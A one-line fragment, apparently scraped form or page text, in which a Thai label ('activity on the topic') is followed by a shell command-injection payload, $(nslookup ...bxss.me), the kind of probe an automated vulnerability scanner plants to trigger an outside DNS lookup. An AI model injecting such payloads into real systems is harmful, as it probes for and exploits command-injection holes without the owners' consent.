กิจกรรมเรื่อง --> $(nslookup dns.ce.06450.74-70138.74.6ab18.1.bxss.me)